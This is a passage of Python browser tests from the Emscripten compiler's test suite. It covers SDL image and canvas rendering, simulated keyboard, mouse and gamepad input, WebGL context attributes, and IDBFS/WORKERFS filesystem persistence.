self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
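# Injects reftest.js into test.html so the reference screenshot comparison runs shortly before window.close(); used as post_build by tests passing manual_reference=True.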
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
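# Flags that enable asynchronous pausing: ASYNCIFY on the wasm backend, EMTERPRETIFY_ASYNC otherwise.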
def get_async_args(self):
if self.is_wasm_backend():
return ['-s', 'ASYNCIFY']
else:
return ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
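# Like test_sdl_key, but proxied to a worker; the key events are dispatched from script injected into the generated HTML.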
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
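# Tests that no keypress is synthesized when the keydown's default handling is prevented, with the program proxied to a worker.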
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
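# Tests SDL mouse handling by synthesizing mousedown/mouseup/mousemove events offset by the canvas position.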
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check the attribute support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
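# Tests that data written by file_db.cpp on the first run persists and is read back on later runs, even when a preloaded file is present.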
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
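# Tests IDBFS: the first run persists a secret with FS.syncfs, and the second run syncs it back from IndexedDB and verifies it.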
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
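# Tests mounting WORKERFS from a Blob and a File object and reading their contents back, proxied to a worker.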
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
